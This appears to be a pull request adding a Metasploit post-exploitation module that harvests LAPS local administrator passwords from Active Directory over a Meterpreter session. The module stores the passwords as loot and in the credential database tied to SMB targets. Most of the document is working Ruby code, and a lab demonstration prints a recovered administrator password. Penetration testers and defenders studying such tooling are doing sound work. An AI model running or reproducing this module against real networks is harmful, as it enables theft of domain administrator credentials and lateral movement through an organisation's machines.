### PR TITLE
Enum LAPS

### DIFF
--- a/modules/post/windows/gather/credentials/enum_laps.rb
+++ b/modules/post/windows/gather/credentials/enum_laps.rb
@@ -1,0 +1,192 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex'
+require 'msf/core'
+require 'msf/core/auxiliary/report'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Auxiliary::Report
+  include Msf::Post::Windows::LDAP
+
+  FIELDS = ['distinguishedName',
+            'dNSHostName',
+            'ms-MCS-AdmPwd',
+            'ms-MCS-AdmPwdExpirationTime'].freeze
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'         => 'Windows Gather Credentials Local Administrator Password Solution',
+      'Description'  => %Q{
+        This module will recover the LAPS (Local Administrator Password Solution) passwords,
+        configured in active directory. Note, only privileged users should be able to access
+        these fields. Note: The local administrator account name is not stored in active directory,
+        by default credentials will be stored in the database against 'Administrator'.
+      },
+      'License'      => MSF_LICENSE,
+      'Author'       =>
+        [
+          'Ben Campbell',
+        ],
+      'Platform'     => [ 'win' ],
+      'SessionTypes' => [ 'meterpreter' ],
+      'References'   =>
+        [
+          ['URL', 'http://test'],
+        ]
+    ))
+
+    register_options([
+      OptString.new('LOCAL_ADMIN_NAME', [true, 'The username to store the password against', 'Administrator']),
+      OptBool.new('STORE_DB', [true, 'Store file in loot.', false]),
+      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', true]),
+      OptString.new('FILTER', [true, 'Search filter.', '(objectCategory=Computer)'])
+    ], self.class)
+
+    deregister_options('FIELDS')
+  end
+
+  def run
+    search_filter = datastore['FILTER']
+    max_search = datastore['MAX_SEARCH']
+
+    begin
+      q = query(search_filter, max_search, FIELDS)
+    rescue RuntimeError => e
+      # Raised when the default naming context isn't specified as distinguished name
+      print_error(e.message)
+      return
+    end
+
+    if q.nil? || q[:results].empty?
+      print_status('No results returned.')
+    else
+      results_table = parse_results(q[:results])
+      print_line results_table.to_s
+
+      if datastore['STORE_LOOT']
+        stored_path = store_loot('laps.passwords', 'text/plain', session, results_table.to_csv)
+        print_status("Results saved to: #{stored_path}")
+      end
+    end
+  end
+
+  # Takes the results of LDAP query, parses them into a table
+  # and records and usernames as {Metasploit::Credential::Core}s in
+  # the database.
+  #
+  # @param [Array<Array<Hash>>] the LDAP query results to parse
+  # @return [Rex::Ui::Text::Table] the table containing all the result data
+  def parse_results(results)
+    laps_results = []
+    # Results table holds raw string data
+    results_table = Rex::Ui::Text::Table.new(
+      'Header'     => 'Local Administrator Password Solution (LAPS) Results',
+      'Indent'     => 1,
+      'SortIndex'  => -1,
+      'Columns'    => FIELDS
+    )
+
+    results.each do |result|
+      row = []
+
+      result.each do |field|
+        if field.nil?
+          row << ""
+        else
+          if field[:type] == :number
+            value = convert_windows_nt_time_format(field[:value])
+          else
+            value = field[:value]
+          end
+          row << value
+        end
+      end
+
+      hostname = result[FIELDS.index('dNSHostName')][:value].downcase
+      password = result[FIELDS.index('ms-MCS-AdmPwd')][:value]
+      dn = result[FIELDS.index('distinguishedName')][:value]
+      expiration = convert_windows_nt_time_format(result[FIELDS.index('ms-MCS-AdmPwdExpirationTime')][:value])
+
+      unless password.to_s.empty?
+        results_table << row
+        laps_results << { hostname: hostname,
+                          password: password,
+                          dn: dn,
+                          expiration: expiration
+        }
+      end
+    end
+
+    if datastore['STORE_DB']
+      print_status('Resolving IP addresses...')
+      hosts = []
+      laps_results.each do |h|
+        hosts << h[:hostname]
+      end
+
+      resolve_results = client.net.resolve.resolve_hosts(hosts)
+
+      # Match each IP to a host...
+      resolve_results.each do |r|
+        l = laps_results.find{ |laps| laps[:hostname] == r[:hostname] }
+        l[:ip] = r[:ip]
+      end
+
+      laps_results.each do |r|
+        next if r[:ip].to_s.empty?
+        next if r[:password].to_s.empty?
+        store_creds(datastore['LOCAL_ADMIN_NAME'], r[:password], r[:ip])
+      end
+    end
+
+    results_table
+  end
+
+
+  def store_creds(username, password, ip)
+    service_data = {
+      address: ip,
+      port: 445,
+      service_name: 'smb',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: refname,
+      username: username,
+      private_data: password,
+      private_type: :password
+    }
+
+    credential_data.merge!(service_data)
+
+    # Create the Metasploit::Credential::Core object
+    credential_core = create_credential(credential_data)
+
+    # Assemble the options hash for creating the Metasploit::Credential::Login object
+    login_data = {
+      core: credential_core,
+      access_level: 'Administrator',
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }
+
+    # Merge in the service data and create our Login
+    login_data.merge!(service_data)
+    create_credential_login(login_data)
+  end
+
+  # https://gist.github.com/nowhereman/189111
+  def convert_windows_nt_time_format(windows_time)
+    unix_time = windows_time.to_i/10000000-11644473600
+    ruby_time = Time.at(unix_time)
+    ruby_time.strftime("%d/%m/%Y %H:%M:%S GMT %z")
+  end
+
+end

--- a/modules/post/windows/gather/credentials/enum_laps.rb
+++ b/modules/post/windows/gather/credentials/enum_laps.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post
         This module will recover the LAPS (Local Administrator Password Solution) passwords,
         configured in active directory. Note, only privileged users should be able to access
         these fields. Note: The local administrator account name is not stored in active directory,
-        by default credentials will be stored in the database against 'Administrator'.
+        so we assume that this will be 'Administrator' by default.
       },
       'License'      => MSF_LICENSE,
       'Author'       =>
@@ -33,10 +33,6 @@ class Metasploit3 < Msf::Post
         ],
       'Platform'     => [ 'win' ],
       'SessionTypes' => [ 'meterpreter' ],
-      'References'   =>
-        [
-          ['URL', 'http://test'],
-        ]
     ))
 
     register_options([
@@ -56,7 +52,6 @@ class Metasploit3 < Msf::Post
     begin
       q = query(search_filter, max_search, FIELDS)
     rescue RuntimeError => e
-      # Raised when the default naming context isn't specified as distinguished name
       print_error(e.message)
       return
     end
@@ -64,6 +59,7 @@ class Metasploit3 < Msf::Post
     if q.nil? || q[:results].empty?
       print_status('No results returned.')
     else
+      print_status('Parsing results...')
       results_table = parse_results(q[:results])
       print_line results_table.to_s
 
@@ -76,7 +72,7 @@ class Metasploit3 < Msf::Post
 
   # Takes the results of LDAP query, parses them into a table
   # and records and usernames as {Metasploit::Credential::Core}s in
-  # the database.
+  # the database if datastore option STORE_DB is true.
   #
   # @param [Array<Array<Hash>>] the LDAP query results to parse
   # @return [Rex::Ui::Text::Table] the table containing all the result data

--- a/modules/post/windows/gather/enum_ad_users.rb
+++ b/modules/post/windows/gather/enum_ad_users.rb
@@ -190,8 +190,7 @@ class Metasploit3 < Msf::Post
     # Assemble the options hash for creating the Metasploit::Credential::Login object
     login_data = {
       core: credential_core,
-      status: status,
-      access_level: 'Administrator',
+      status: status
     }
 
     login_data[:last_attempted_at] = DateTime.now unless (status == Metasploit::Model::Login::Status::UNTRIED)

--- a/modules/post/windows/gather/enum_ad_users.rb
+++ b/modules/post/windows/gather/enum_ad_users.rb
@@ -190,7 +190,8 @@ class Metasploit3 < Msf::Post
     # Assemble the options hash for creating the Metasploit::Credential::Login object
     login_data = {
       core: credential_core,
-      status: status
+      status: status,
+      access_level: 'Administrator',
     }
 
     login_data[:last_attempted_at] = DateTime.now unless (status == Metasploit::Model::Login::Status::UNTRIED)


### PR DESCRIPTION
This retrieves local admin creds stored via the LAPS solution if the user is able to query them in AD. (Misconfigured or user is already privileged). 

Active Directory doesn't store the local user account name, it either changes RID 500, or the user can specify a username in the Group Policy.Therefore we assume the local account name is Administrator but allow users to customize this if needed. As such storing in the DB is disabled by default as we cannot be certain of the correct username.

Some of the logic may seem a bit weird, but to take advantage of meterpreters DNS resolution we have to loop over the results a couple of times. We could query one at a time but if you hit a large domain with thousands of workstations with this set it could be quite time consuming.
## Setup

I used https://flamingkeys.com/2015/05/deploying-the-local-administrator-password-solution-part-1/
## Example

```
msf post(enum_laps) > show options

Module options (post/windows/gather/credentials/enum_laps):

   Name              Current Setting            Required  Description
   ----              ---------------            --------  -----------
   DOMAIN                                       no        The domain to query or distinguished name (e.g. DC=test,DC=com)
   FILTER            (objectCategory=Computer)  yes       Search filter.
   LOCAL_ADMIN_NAME  Administrator              yes       The username to store the password against
   MAX_SEARCH        500                        yes       Maximum values to retrieve, 0 for all.
   SESSION           -1                         yes       The session to run this module on.
   STORE_DB          true                       yes       Store file in loot.
   STORE_LOOT        true                       yes       Store file in loot.

msf post(enum_laps) > rerun
[*] Reloading module...

[*] [2015.06.23-22:53:43] Resolving IP addresses...
Local Administrator Password Solution (LAPS) Results
====================================================

 distinguishedName                          dNSHostName       ms-MCS-AdmPwd   ms-MCS-AdmPwdExpirationTime
 -----------------                          -----------       -------------   ---------------------------
 CN=USER-PC,OU=Workstations,DC=test,DC=lab  USER-PC.test.lab  6a+20f)8{T&!(g  23/07/2015 22:07:12 GMT +0100

[*] [2015.06.23-22:53:44] Results saved to: /home/ben/.msf4/loot/20150623225344_default_192.168.5.102_laps.passwords_367676.txt
[*] Post module execution completed
msf post(enum_laps) > cat /home/ben/.msf4/loot/20150623225344_default_192.168.5.102_laps.passwords_367676.txt
[*] exec: cat /home/ben/.msf4/loot/20150623225344_default_192.168.5.102_laps.passwords_367676.txt

distinguishedName,dNSHostName,ms-MCS-AdmPwd,ms-MCS-AdmPwdExpirationTime
"CN=USER-PC,OU=Workstations,DC=test,DC=lab","USER-PC.test.lab","6a+20f)8{T&!(g","23/07/2015 22:07:12 GMT +0100"
msf post(enum_laps) > creds 192.168.5.102
Credentials
===========

host           service        public         private         realm  private_type
----           -------        ------         -------         -----  ------------
192.168.5.102  445/tcp (smb)  Administrator  6a+20f)8{T&!(g         Password
```
